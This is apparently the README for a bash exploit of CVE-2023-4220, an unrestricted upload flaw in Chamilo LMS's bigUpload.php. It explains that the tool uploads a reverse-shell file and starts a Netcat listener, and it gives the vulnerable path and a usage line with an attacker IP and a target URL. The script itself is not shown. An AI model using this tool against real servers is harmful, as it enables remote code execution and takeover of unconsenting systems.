
Refurbish Chamilo LMS CVE-2023-4220 exploit escrito en bash
Este script explota una vulnerabilidad de Ejecución Remota de Código (RCE) en Chamilo LMS versiones ≤ v1.11.24. La vulnerabilidad (CVE-2023-4220) existe debido a la funcionalidad de carga de archivos sin restricciones en la característica bigUpload.php de Chamilo LMS, lo que permite a los atacantes subir archivos arbitrarios (como webshells) y ejecutarlos, llevando a una ejecución remota de código completa en el servidor.
Este script ha sido mejorado por Divine Clown para agilizar el proceso de explotación, generando automáticamente un archivo de reverse shell, subiéndolo al objetivo e iniciando un listener para dar al atacante acceso directo a la shell.
/main/inc/lib/javascript/bigupload/inc/bigUpload.phpbigUpload.php../CVE-2023-4220.sh -i <ip_atacante> -p <puerto> -h <enlace_host>
-i <ip_atacante>: La dirección IP del atacante para el reverse shell.-p <puerto>: El puerto donde se iniciará el listener de Netcat.-h <enlace_host>: La URL completa de la instancia vulnerable de Chamilo LMS../CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com
Esta herramienta está destinada únicamente para fines educativos y entornos de prueba en los que tengas permiso explícito para explotar vulnerabilidades. El acceso no autorizado a sistemas es ilegal y puede conllevar cargos penales. Los autores no serán responsables por el mal uso o daños causados por este script.
Siéntete libre de modificar este README si deseas incluir información adicional o formato. ¡Avísame si necesitas algo más!